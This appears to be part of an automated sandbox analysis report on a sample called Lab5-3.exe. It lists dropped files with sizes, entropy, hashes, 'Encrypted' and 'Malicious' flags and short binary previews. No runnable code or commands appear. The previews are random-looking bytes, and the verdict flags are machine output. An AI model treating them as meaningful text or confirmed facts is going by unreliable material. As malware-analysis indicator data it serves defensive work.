                                                                                                          Size (bytes):97296
                                                                                                          Entropy (8bit):7.997890472952579
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:NWvh6Aa4lzsBUss2YTYb8UiOKzg7jHbYiw7fipgl0/E0puRDiIdBdiY1lqNPmYAw:NWh6DvYmkU7jbqDiLE0puRDiov6mYY/q
                                                                                                          MD5:F1048DF7BE3C1261A9C49AEAEC2895E0
                                                                                                          SHA1:3D28E89F8E7F6A7A752E906198F8B924B0C60C0F
                                                                                                          SHA-256:F564E2610CEE0444A17F719B25D055BE89456B6C04579E66F79F43CB1F7EEE6D
                                                                                                          SHA-512:E8D1C39665FCBC3A7C74B45FC4D2537D969741F91BFE1EEC1D1864674CFA66B5D15A4C1455E1B724FC9BA0A5D321DE5580ADF43F8E1791A612D063E1FA7B746C
                                                                                                          Malicious:true
                                                                                                          Preview:6.#...7.vS|C...|!...........g..5.w...A.L.Wqy.r.8....e9.yK......*.%.....\....(..6......_.d0o..].nC..b............b.Q/g.4L!R.....X...H;`..y...4.#...z.......Y..........Ej..)d%.M.?V.l..'G)Pk..A....*.g..N...2.lrn....Y....+..V.U...n?.G.G|....^k}.'..uJ.wk."P.8.Ksc.F........q3K`kh..R.`.J8..E...P........l...u..k.[....4...}3..uw...s.]..4..6.[....yr...t.Q.?!3).. .....w..h.N.....)Ik.x....dd.n.njq,6,F.;5y..;.7.Q..7....qY../..G .._8r...r..!.Ky.n...l...B?.0O.......4......q.}....."....o.].e...<..S..g.4.....$....}h.[...IC.Lu.....~...l..k....VC...C.{TU..X.....n.k1..X-....`.....<.....zP.0.N.E.g.3.=...m...;......yX./..........a..vO.H....*..HaV.>Y%..........;.....B.,...L*.Ph.I-~.+..#....X.;.K.....Fa.Bu.(..G.j.........*..!..1...kCV.!.DP.........L.W..md7.u.`....T...f....Y_.0..+.5...........|QM...\.N.Z(.9.~._...R;2..}..j..~.*.6.)..)....ut.G......).h)......zw..").....nm.p...v...WfW4)ZVC..4...TP>)..Jp.4.e....S=CU.B.Z<..uFL...:..:J.}..C.....h....z..Xa..u..H..P>...z0
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):320072
                                                                                                          Entropy (8bit):7.6737914802613245
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:Leg4mR+yJ+Fm9BcHPMcOb8LPT89oe2Ru0ao0XsGH96e2jyrEQ1xyJmc7cuVfuhyV:CsRloFmbcHPMcOb8LPTqoma0XsGH96e2
                                                                                                          MD5:F3F64D416B465C3BBD8CE09A7D9E7334
                                                                                                          SHA1:16DA2DA655C0EC1CA3A4883FCA9873C2985D7220
                                                                                                          SHA-256:9047C2411F0C74241FC6B9A75ADF00A06A2316391A515CAEF8C046AD5BDF1CCB
                                                                                                          SHA-512:15780B33DD8A6144F76BED5570D30B49A58947ACDA5BA926E3DD6AE983DBCE34E728F0015F5FBDE7B4DB80053C0A77B5E5CB2DE10CF45B4463F956CECEF00C14
                                                                                                          Malicious:false
                                                                                                          Preview:...w.b......H.#c.o.p..A7.U.6bzI.m...P...q+...[..4L..P.G.z...y...dR......3a#....E..6d.g.(..{..$..J.. -..o..W.S.o.6..r.x..9...R.y]....-..Z.............".$.......pf.....*D eQ.?.H..`4i.....&..<-[.x.M_<.bIat4j`....}{....x.k;...m.%.@..4J.9z........s..C..\.7m..`..L.4X}..x.A2......Z....".+.B0:rG.q...{..z..&-..39...T...P..M;:*5"h...%..w.l.{mb.....v.h/..=...s..a.M....~...e..v.._...@...w.Xp4?..WI.WS4.vy!R..>..Q.j.b;s.\..f.Yg..-..1!?..$.....|....,...B*.M(.3...M[nV.T6...@...?..B._...JB....p..;....#w..R..D..D.-...%o..((f..J.........z9.3?.F3C....kc6.lv.^..5.?*j...d.=.m.`.L.G...s...<I....%....`........DR...{D...$z.a-.;.:....5..d...(..rO...H..O...,D,..HF."..o.0...Z.V[v6e.]..:......W...%PW.9.z.v.u...k.m..NqC0.]..T..!C|!.C..$.A......$.*.../Z.8....C\..B5< .G............".(.,O...q.M.a. .63]....ac......"..o_...k..(.>...Vt/..L.v..z.E[.D..O*..$..b8 iE'..........2.1..,G./M.O...`.e...u....M..=Cp.msH#-.<..?...$...}Z.J...z..}....:1`..w.^F....lj
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):160736
                                                                                                          Entropy (8bit):7.9989894128748436
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:nLbPGii0BVuZ1FO5+G8cKS73cAb2KcYcEAkR46oAZCI5sm4Z:LyfhiAjuApW9RnoAs+4Z
                                                                                                          MD5:B299D97E6299C38E238641A0E261FB48
                                                                                                          SHA1:FFFE4C0E07F2A4FD4829A42A1B5EACC931A1D046
                                                                                                          SHA-256:36DC49BC93121D124818A8E159B0861456ABA5A20F02E9D46CE46E72CAD18BA2
                                                                                                          SHA-512:29A4A8C6DDBF1B6E8C31522F0775C2193BE9BF78215441F5970E8C3669E7259078D5FA0B9E0A0C9FB1029E37BF7B67775D7E40EAC65C756D7B7AE1F9F4ED0DB2
                                                                                                          Malicious:true
                                                                                                          Preview:i...;k[..vL.9..+..I....N'.R....%...).....&a.e..................M....UZ...x5...W.......g...z[....AO..^..}3..#Z.........gA}.~C.PG....x.../......n...|.U.&...,+q....K,T...#.*.s..[..M.:;..k..O...l....<.QX.)R`.._Z..m.N.m..._..@......Gr.r...S....&i...qV.r.>b.......a..&...n.......i3[.E....p...ED.../.d.....)u.. ^3Y3..?..<aB]..0n~.W{....Z7.........*.... |U^...[.`...;1T....>.f4~..s".--...JN.Co....:.v...lB...R..7GU...Em..$..&N..^861}pP;j..{.2w.1#Os.b.r^g...D..@L.u....y.(xE.>yB/..D..[I.Uw.S....o....B.q\$.v.|...`..e7..Z....w.<pT......L...:*_pb..[...).....X.'....!Q..m%....j.V...../O}..&.C&.....x.......*......n.A.&.. .2.'w.F..G.i.....x...+.?o.>.PY..Y|.j..OD.H........1....U.S......x...Q@.+w..l..........q.VJ...H..#.<.._}\.h.........v.Mu^../.t.Unu.........a..3G.x......,#6.......B.u......Tg.TE..s.....M..op..$....em._^...b.:...W`.pT4..N..=..!.I.Z.gR>T.E.&..^..^).(:......5...&..Of.H..I....&.).._.;......5d...{......."l.'..u'.&.q.8..p...!V..>....}.y..}.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):192384
                                                                                                          Entropy (8bit):7.999032955540406
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:YDTtKk/Te3j6gf0ZCWrN1HbfcSlMJYUdDl1Bq7FPV0+Xv7XQYHRPMPDW4rL40Z:YD5hTe3mgo1HrXMJYcOns094r80Z
                                                                                                          MD5:0DA1CF987BD2F57244705573D524DF4C
                                                                                                          SHA1:7EF636DCBD070396111C9CCE557E3327D95B5C72
                                                                                                          SHA-256:ED1FE8EDCFF573D8BB05931FF1D8DB9AAD8C6FEA348F8BDA71D93E8EFB53CC5D
                                                                                                          SHA-512:CE2623EB717E3BD860C55B70E2938F37447BFCB90356DD5FEAAF8B9445BDF3905F170C658DC87C682CB31E982D961AD4AD2909618ADCAB444B7E46E7A80B5CE3
                                                                                                          Malicious:true
                                                                                                          Preview:. ...E.b...=O.2R.2YV}.q.j.......%#O..=.......8.S.i....b./..>k....^#.u..}}...f.d.U0.....Qj..'.n!.......B......=A...P..=.4....Y.....B.pQJ.L)3P.....~....U.A..h0^A./.^......................#...l.........w.q...Q..J...).Q..C..>.t.....^x..!8.........^..!T....:..C:6t...Z.T.3_:..s.y*...E...#EG....N5..3>...t..c..<.{....2...I....iB...~.5... j.......3......L..C.fxm.'..1.54.x6'.9<.....l...%.....6.M9.$.....U../l4Y[....r....(S.......kVh...+?.<.(G ......j....'.........qL..|.S....5;.!od+@.S.o.E.h...a.......!4....S...\.....L..).H.<......_H1.6!.. ..E.o..X.M...^..3Z...........i...bQ;..2.T.N..-..m.&]..h1...D..D..a.*(... .YD...!a!..C.....h../..!.q.^.~..v.pI..y....Q...@.:d.B.P....S...5.[.M.."..%."+.....=.5..::.1..%.InH./q...zG......Q.$.O.....#..`.....?"XA....G.J......p..2./..&.Z.]..`..3....4k,....p&.....T..9L2.....?..E&A.D.g272K.c...&......{}..tH.....*E....2._.H..).V...S}.L~....$.I.?...S..,.e..y....O...1Vj..Y...^..+..".8b..}.BN..[..C.L..F..."....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):117280
                                                                                                          Entropy (8bit):7.9980219966572665
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:K5QC8+NPVPXZjNyVM7cg6t6I3enDc2qmKYzZ:IQC8SXZMxgLnDc2qmKuZ
                                                                                                          MD5:BA647EDA0FF37BF16C2479CD0F365D9A
                                                                                                          SHA1:B202E3B97A6F212AEF795BA96B167E3FE0EF633A
                                                                                                          SHA-256:AFDEDEBF893AFEE2B0BFCEBB26C303B8C8BEB6BBCD9106E054416890E6BF68DD
                                                                                                          SHA-512:4AC49E2D99ABA5AD67032B21D71D1F365522A9698EF4A0965F4EC2F0D946A9BE89E2C06F9C8ED28B6D37A42CFF0EEFC50DD539A6E38F97C2F7E3B919835A28DD
                                                                                                          Malicious:true
                                                                                                          Preview:....(.P.....^Q{.C...B.\k...g.u.+bE..;...9..B^.k...4....r9....t.....O..`..U..r...k......_HgB.....1@....... ..N9....&h._RZJ...2....E..)........yX.M+...4.n.Ah' ..J...g.v.._.#..)......g4.1\....5U.1^.,..7..L..}..vU>w.....P...i\.....=.,d.o.[1..t..3..EK.+....,.Y..R...D..m..f....+X..Z....O....V..LUR(..0x.....p.t.....H.@.z..Kl}h...+..4eM{.8.Y....$.p.........c..w.....d0.....#]e.s.Xy.N.T$...4Q.S..4C.L....t.8..K[UdS......D.;|. SY....<......6R...._.3.?..rn.FR.P.a.4!..S.+hxw.Y.].......k.*PlbzJT6B<.......P.M..3.J..o..&._:.z..;.QI.,C....c./.s{w..%.QD"X..V..Y0..s2..&.......c|.@rfX.s.8|.T.o4vf.-.^..7P..D....k3.[.F...s.(...)...I....h..?O.lPwU.?S..R....{J....|....h/..Y........t....c;.{}..Q.."....m%Ys....m'.G.Z|....?". ..w.9`...P.<.F..4.........l'zX...GG.S5..i....r....>{mA...1M....m.(Cq.!o..c.....I......0I..ej.G.FZ.5&....+...#.D..._..6.p._{..h.i;.....7.e..NPr..h.^...Q....\-c.~9.0..S.g.Zk.l..|..1...4>L...T?..17...4...y}g..n{SE.w[.{............`a$.W.K.A:#.7,
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):180496
                                                                                                          Entropy (8bit):7.998866232939321
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:/KbTlmwKCy8n8FB4b/gaXqM6kjLuuc3DYhOhcBSGHbtSo3ITpLCZ:SbTlmtr88FB486qM6ktakOhzghSn1CZ
                                                                                                          MD5:E2481A746817C2B080A686A2CF0507A7
                                                                                                          SHA1:FF8609436279C311821DFCC5C5BE520078CB2A35
                                                                                                          SHA-256:BF944D0328408CD714001913A9A8B32AB2AD62C7A60BB459FE4E47F3B466CF53
                                                                                                          SHA-512:81C4C35CBA2D4B78A90C6E658E150F360AD4D669851B77FB2EABD51138303AFE416B0B50E12C0C8165860E72E41AC905FB5BF90A870E8782E7804EC7A6745C1D
                                                                                                          Malicious:true
                                                                                                          Preview:OP.d.@w:.M..'...0......$.~.....d.W.o+.P.7.v.Q..O^.@.6.'.)[..\..}..0..8S.[.\m O-..x...........YE.2^C.u.z.Nz..G=eW.a.%xN.i9^.?O.).@."I.$W....>7.a^...i...X....M..77T....M...S.A...Y.......y.2..k.T.6.F......C`t.O...$..O.....).J..........u/H..%.....^..DLb^.v|......-,....:...Iv.] ws.-.8.I..mx.#j.Orf+...CNF>..L.D..@..i.S....H..A.t..X....U.I.3..Q<..-J..~2.{cIf.....I..N...kF*...>u...7h.....Ig....F....+2...z..........\m....u|....A."../.._..qG....CB.......$HF.!.-.7@.[.d...Q...W#._.G...k..u...@(QV]....y.........D......~..V...,...".!`T.......A...Rg..kn..a.n.....rb.W.t.~.R...dl0..I..B......c...|...U......}..(..C.....).{.q.Z..e6M...T.C...\...Q.[TH...l`.zg.Bh....L\\.?..}7.....KZ[5.R.M... E=,...g..............UMS..kU...... .~>...x.N.W.ET.F9.4..\...\........RG....{..l.\..:d.....#`]}..N)g...%....Wn..>F}"\9rg.M..G..b^.!.}".j........e.?.PG....+...+h.W..#tN....o.B..J. /..@3.......wG....$...$.Q...H.X......-.gN..G%...P..f.....7..g.a..D..mZ.q..H}.. ...p....D0K..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):306076
                                                                                                          Entropy (8bit):7.763146610104288
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:IMspZGSaAADmezpORh4HpzHeNXSy35xnBDnxV6sLR1DvmgOM5LuB/eCNmkhuggMN:+ZGS6DmeFOR+kNCohdLR1DvmgOM5LuBt
                                                                                                          MD5:1E039EA0B0CD46E059B47E50334A7A2C
                                                                                                          SHA1:B01E5CEBA1D2450C61C8D4ADF56E6E02EF377B41
                                                                                                          SHA-256:2B7EEFAAEE62E7339D78B93ABDEAE47953EC26CB40238E4C308B24CED044503B
                                                                                                          SHA-512:F6342964531788F91FE1499515A9D141CD34499A2B6541461915193379782CA5C84C895BB8DDF32286D5020D69C6CBBA180879AA476445072C90A15F14361C7E
                                                                                                          Malicious:false
                                                                                                          Preview:.+....9c..I..&...X...6..S...<....%myf~..........rA...e...L.L.1Q.`.p"....eB/.....~..?r0..W..t3........W9M.G:.x..=lCp.,t&.G..c..*/c.-.>W.P.Z..j..j.pN.'.....?P.b8t*..hc...o...=.G5..J....% ..A6...q.X.;.~.oR.N.....6..7.+i..X....Zx".N~..eG...Z..9.z....E.I.r`h....Q.>.&*.:..f,......Q..dqy..;v......d.w.J..I...2\{....R....n..$.].z.,n.]...qz(-.K..#...Rf.....$..].!..@.'^..._.i.'D..8..,....\..l..S2.R.;KH.....vp .......@..?......=..&7..9.l.?......Gh5&.....CY.bB.>.;,t../M|....3l. ..f..g*H0........%f.0..?_.....3o.."..E.[j..A....b..%...T...CI..X...f5....(.....U.Q.Q...D5......E.....'.1.@M".Ki~vv.=G...V0..C4.`qb................{..8..oP&...E.Pp{..H...~e.,........y....v.Y.....v61.[1T..z.Z...(3Qkv.<..L....*:\r..g/........Zz1f.(.a".....p..A.N..+4.|..w...g_..g........#P..?!BT...~..0.:{..4...A.P_.S..W.....-..,..F...h........c<H.j3.....*N..O8 ..b ..(.1._{.....)H..Z.....h.fo..?\._.....j.I..SO....[9.^.3bq.0R.k.(....VWj..w.[Li..].V.(.ehs.....gz..`..XI....d.!
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):100304
                                                                                                          Entropy (8bit):7.9983787916668625
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:IqF6xvADFRUT32/sbpDPsKHVIOOGJ4v16amBMhlM8ZX2XAH70PBDE+IkTGEZ:IqF6xvAIy/sbpZh4v16aCQl/GK70NF/Z
                                                                                                          MD5:CB9BEE7EA98D3C6D8055A369E4FB850A
                                                                                                          SHA1:0955B0CAD261F164DD96E072F9A2637E12B5A8A7
                                                                                                          SHA-256:AF6C3BE0786F06B2634CBB4B07EA545888105C0C490B3603DB0E9B77C9A4A255
                                                                                                          SHA-512:002384255F27C63CE43E95BF3B6CC605A868D64AC68D280EBEE9C2D4EB1EB21D6D47F359A28D73C01185139B07E0C40749DC5F011E03ECB61695163B70D64DC9
                                                                                                          Malicious:true
                                                                                                          Preview:.k........IN%.!..'...$...a2u...:..X..'.T#...x....i,../3.Sm.(7.............h@..:.+!.lI....l...A...nZ.Qf...i..~.CM(..*..ovY.n.Z4...1..v...".#X.1..?..[.....k.;1oe^...u...I?.../.TI3........J..>q.Vt'.._2y..p.cB...j.v..QE.x.q...I.....Dn..-.T.L..Z3.....++.t.z^...uZ..n..FF.`.dt..'../X...B...C.a.e..c.YPf..Gp....p.Kg.Si..0S...F.r..%....qU..X.V../q.w.K...c&U.6.%.U...u.....y.H..t...D..a.C...O....<s....9.)VS%.T.i?...w=t...3u.} AW.i.-fn.$.w......vJ\mR.......O..~..5*+.w.O..D....#[..#........./....=Bk..@BUkd........_X0;. .........5<..Q.."I.z=....L..90@..].?...<..:.....hy....{..%Z..U..8R.E..z.."..N..!..b....E..r...N6..........u.....pl..N......;. r.k..W..[...........nz....RW.F..Ov...iN..K.....`'.x.YZ.4i....7A...8}E.....!..-.........6mOo.-/N.pxp.......({.#J..r...I..7.....9..1.....9..4R...a.T$.i#..(..o.I...fN.r..Z.#.x~K84.c.".HBC..|Sw..&L.....5...4.!.w..C>/......}.........HY.1..$.6Fb.g..f.8....&M.dS...q[^.^.,#zC.i..fM..b..q-...._..^.>m).<N..?^c....."...N.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):103872
                                                                                                          Entropy (8bit):7.998170332533438
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:d2ZQx4mAw8N3ooeRpQAa/9N+gDfG9g69bGXZ:IZu9Aw8poo4Q1/9N+zg0bwZ
                                                                                                          MD5:DC4FDAFB68C2151404524788E52DA5EC
                                                                                                          SHA1:1F15302E0446526131D26BD30C0531B3921CF145
                                                                                                          SHA-256:C832ABE742B1A5AF8F5101ACD8767436BD85921850A7F04F34CDE3F8D50DE8A0
                                                                                                          SHA-512:B536A555BB83A4CA669A23BDD71ACE9969AE4F4EF93E97809F7C3141408D5CDA078C84932CB8EE0E862EBDD257D2E7261D22F6D69E6242132BF0A41B188D3832
                                                                                                          Malicious:true
                                                                                                          Preview:.)z....M...g..h.|..u.6.]..g.v..S....L{F....7^..y..R._R%...H.`.......+..=.T..rZ{.i.40..s|S{..Q..B.-..}.b_.1.i..T7....b.J..;..B.P..5$O.V...c.y\^..N.RA..3..;.,.Q..<\.uI.&......T}.....X.O]}d.xn.`.X<..'..v..kJ...`...^6..N[8..A....HI..f..Q[..Y.}...p.79.2..J...F@...}..W..A.G)5/.P.~.5...R..XN.@u..#F...=..(...A/...7...9Byo.k...2.s..81(.b^\?8.F$V.....w...P.ka.%..`.Q~.3...Rx..7....%.q...U..$(....-.w..>C.>....5|;....}?.:.B}*.o=.UQ.sB.J.....w.B...oz@r..,b......~..9Yw?l.U.0....iK.u.'.Hc{.u:n...c........'....3.......UH{.~.c..|.T#R.x9.......^..xy.?...v..i..oX.3..Y....xh.......ya....p.p..M69........".r...:..i'.+R.MG;~...U.&...3[b.(..iC..V.J...H....^&.$T..Z.]H...P.../T.....S.;...kv....I.&....s .... /\.!J..5.v...#.....y.....&..d...&.|.v.ix.&Z)B..9[V.=.].......M[t.b-+....kahY|.......k...d...n.0.Q.].$.~...;|....K.w$H.$.ew1.R..6...a..a.8....n..@.r...."..S.....4........4K.].....I.jw..#.?8.....@..)....._.M.U..C;.).I.).....Mwo'."x..P.0.[..'..?Q.h.=-&..b...A..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23968
                                                                                                          Entropy (8bit):7.992729910421655
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:veTqdbfrByRi0H+lvmZR2HchmkEOeqT5xNXVqRfdnFWUaf/o76D05m4WYGo04pQQ:vFZfonU63TdXVqRfZcUao8YFGo04uuZ
                                                                                                          MD5:B287F14CB00A4A660FA3D7FEBAEC680E
                                                                                                          SHA1:31338DDC2DD6150E98237D016A954B53CCC837D2
                                                                                                          SHA-256:47B0387C7FFC636ACFD58D36CC4A13DE86B500DC3FF4A360BF1DD4F512D041A3
                                                                                                          SHA-512:286E3F257D53487A69F0B12B1ED2D1D036224D5DE32CC0DED38BFC0640A39282AC1347D741D90EEC8EE229EA5660E4F70A75E5DB04062B9FC0C9A85E99D06D31
                                                                                                          Malicious:true
                                                                                                          Preview:PGrR....v.D.. D.H'.S...........T........J ...0......D+.xNI.B.V.......Hk6z.4.s.#..XiD..-...s.m.}...8.P... ..q5..Z..H....l.....p.....;....)Xw^...v....j%.....ng,...z...Y...z?.cqH=E.....N.U..n...{.;.B..8 .B.f.E......* ..CI .9.].=......V.......z&..........h..bl.Z..Lg.....I...P/....\...L........v..$8m.._.|.6...2]...=....b.b.........oE..];.`gtB...K".>..V.'.{@....E.....NeyQM. .$u..=&...Q.ng.....)........".S.nL9.h.y.j\....s.v.(.[.......j..1.. .Y~^V.Z..D.X...s......is.....jC..3z.f......&....N*z..7....d.vuf..0..Yj:%.z.^...L..?.~p..P2.k.`.Ys....R....z..<.S!w.3o.....Z.z..@.".:p-0..PS........)..A....O....ZyI..Z.0. ..5.W".7......RI.@;4.. .4....7..gP.'..M`..0 9......g.:.`..do;z..d}\..g..X!(p.O.6.o.<.zT..@...V1k.....e%y.{.=.;..*...S......J.....;.c@.f.6.s..p...F..."....:(..?1.......:.c.&.....Z%..{.............^..A...z..$..cM.......d...`<Tw..:.I.7..........jMeAQ.:..m./%+R..az;...v..e. K....rr.<..)........bv...Pk.O...n..f=D?.9.'(..`.q.dW7.J...,. ......4).
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):200848
                                                                                                          Entropy (8bit):7.998950901345747
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:Qh1DnPjIhNpEyDbwp7oe/p7sWeCLBP2OZ:Q/E36p/RB1
                                                                                                          MD5:3275A6D11FC83C7E72222C801FE1F585
                                                                                                          SHA1:B9A01C47BD4B7AA7D6836788336D9D6C3A9881EF
                                                                                                          SHA-256:8EEC19491479C50F9CB864F1A619AD57FC21A9A4D8819BD8689CADAA2DB50CBC
                                                                                                          SHA-512:B4058C3A408969A616C32FAECBB51DF6BC79330E6EE2678138B937EE5D36CDF31A8D568BD0D4DFF7C3C95B412BC6B82CA7547E642A0D0B9F717F80D1E1CE5D38
                                                                                                          Malicious:true
                                                                                                          Preview:..V...!.0Q....Uv.. ...y..N.....L....U+4..._...o..2...?&G.*.s.^.p'm.db.....IG.Y.g.j....W.x8S25..W.Z8.8.pnY.-.-..."6..s.2..xFia_..Y/..+..!R*..Y.C....R?lW..]p.F..I.\>..........N.<D8.A5..y.W.....%.6e..\.....h.LW..lQ,.M.9..e\}..}.E8.$....=9n..#Zb....... .?c.F.W.#....(.U....K].........f6.\.-....G.....b...........-.....O.R..U.E.N....E.6.....u..S.R.....W`.uf..oj..!.Z.hv.j8U........M.jEt.w....!.B.d..X1Z%......^..?.....H@/.~.XW.W.9X..Q.'..th.......G..w@N32.$s...l...eP.r..j.GJN.+.t.\uy....>...u.^..C.T.Us..K..<.c....7....!.\...)u.5Y.....p.Q.....G`t.q..../...1e.M.G.=...9....NL?....../$z.d..P'....;;Q..'.......c..v\.x3.>...AZ.$9....{H..Zhl..M.....Y.N(..P.......^.Z..T..)M.(...%.GV.r>..7.7/YH;Z.az...4..5.....N.....U.&....x8.$.k..#v.A.#.o......O>7..`2....S.....).#.T..{O.mf/....yi..#....a..`.*DcG8Q.g.....20.....?z.n.P...bp..s..8.....b......&9.$..Qvq.....>.....R...6.5....gH........!......Kr>.....;.H.............T.......+$..s...b......5...........!
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):227920
                                                                                                          Entropy (8bit):7.999090975540942
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:FgiXYCcF1Is+ytmMbcTzucfA0bvGlyEvov++NC6UGrmSpmIUDn/tiZ:yiXYd17tmMbyCIEyPG+IB27
                                                                                                          MD5:B402A67E8A038B1CA813F84DB44CB28E
                                                                                                          SHA1:6891371CDC120492CB8949B2820C9F841265329D
                                                                                                          SHA-256:2F00A504C6C45E701096F2D9431CC69FBA0CD78BB23D60DF34E2F18E102B1248
                                                                                                          SHA-512:CD1F99617C366442B3740116C3B68245CA47FDCFF9065A5054B0B9EE98FEB9DEB337AE307088A00E1E8D8A03E8BCA14E3E6122839E086350A79E16C186C24DC9
                                                                                                          Malicious:true
                                                                                                          Preview:G....R..R......H.P.......J...q..I..C....qJ....l.y....Eqaq..}!.zJi.i.{.{).5.'.F..$kB.]..h...HJC..-..N'J.xZo.-.......La.Z.q<........S..}...........c..x...q...4..i....RwJ....m..\.^.9.$LF.S.....zB...Px.}.<.j.......].I.+=L.Va...W..Q.. ]...".....d.. ..X....<.B.Gdk...'..i.f..491..,.......o.f<.k8,. .....o..w.+.?.x{.m.X.l....9O.....\....3.....I4.:..(<6..H..d........$ UpK..............6u.8~.......g.9..<.....u:.{.E...=;...g.q.Fu....<.k.....T..}.}.~Tj.s.DU....x.3...*._.1..p..P..!.{ib..$&............L...S...?{.s].......$......1C.i..).T*B.s...._.c.....h8..ki..r.=...."...>...,.H...^.b...S.].'5....X...|.k}.#.7TK.Q.oO.....Sq....>A.4#>3.:...e+...$...y.a.,{...S.....,.*.i!j.r.L4,......E............qPM.....X.I+.bD...:......LzEn...b...y8z..8N..?......UC.i..6....o;-.Y}s.WU...Vx1......~.....Mr...v...a.V?c...KNr.'.......G...v....8!\.x.....@.w)....p.....#.8......c.].o._+.............g..e....Q@.......R2..=z...R#|.H.)]..k.......*Kn.Jg....GD..E{.4..k cZ|.....f.......bK
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):194640
                                                                                                          Entropy (8bit):7.99904286704624
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:Iai6GijO1/SYONqWt2ifD8EfGGt9PZIW6PXUfccuSIxnlEGKF2OI0HC2YPMH81tv:IkneEqVEueqW3fFuSIsGm2cHoA81tgHi
                                                                                                          MD5:9B931D60A3990FC13B4C968243B58288
                                                                                                          SHA1:ECA40A74FD1026F75E06F77F73BD0741D4AA24CC
                                                                                                          SHA-256:DAA4009E074207D047CEFB9646D41FAAA6DDE03114546377AA87321D047C124B
                                                                                                          SHA-512:B78EBA702C82937534302D89E0DD2BDCF1CA2E5C7C9AAC1899BAD4511DA06008FC7DF32D4531B06A79978E104ABD0EC0942AED1AF3AEAE25CD78782BA6661D02
                                                                                                          Malicious:true
                                                                                                          Preview:i..........I....a...n^....y$!..j...;.F..5.U...%./...;.eV...I...o...ySj7..b.V."......0..........2........g.u.8B...@.+.6..s.Sc..K.......M...7......V.L.j.:....!....LE...o..o.P.....7.to....}Y1...|<{M3....\...3x...k.C.i....Z....*:.9......./(_....1Z..8>:... .w...n..... t`.z....?]..&..........-*..O........B...i.v..?..N7..@.Y7.mC..6.E..L/.I..9Q9..B)I."...B...&i........%d-.......n..........B.P.Z.N....1...0.F.Ct...#.b..|..../.........M.k..N.2..y....g)...=....Y(...ye.F...z.T...........v.w..j7.Kh..6.+.XZ..^[..N8.....h..ls"..y..T........v#...cR..\.......r.~.p?;.%.'..xU..I1..E..n<..D.x.6s....".C........... .3.'....s .F...@.`....vJ......B`hO.&..p^....).fr..j.....,...I....b......Y..p.....y[hZ..\65JC#F.-.J......=.L....}2..Yh..q..A.R.2.....IGl}.d.Y._[..I...p...?ZLX...5..+Q...%.#..a.g..."BY..%D.G..."..l.] ...3!../~...........Y..C.\....lKi...l...E.J/..1..O...-V .K|..0.d.:.......`H.BO.......v.xzs..GxA.S.A...5/..9..a.C2.....d."..Z.)..dd9...]..B
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):173024
                                                                                                          Entropy (8bit):7.998822609830449
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:/zTwrnURReVPssaOogL3g6CjZ/sRshfdgQA7YWjJ+rVHjysG99AEoOZ:/wLURUPLwvheR7YoJ+pHq0OZ
                                                                                                          MD5:55E09D1C99ECA3428D120E0C15FA6F42
                                                                                                          SHA1:22849BD0467D1FA9F356AD00CCB1B99AB92E1E9A
                                                                                                          SHA-256:90ABAECD81C03905B42B288DFA5E364FF92CCED6DFAD0B9D548C1F70D7CC16F5
                                                                                                          SHA-512:69E285169D355A97C228AAA6BCDEDF253A6CEDD313775D13B94F88EBABEBE0EA3A7887E2F21599AFB7CA198EEE2C5C16362CA9A86F2A48BBF651F289194F33E0
                                                                                                          Malicious:true
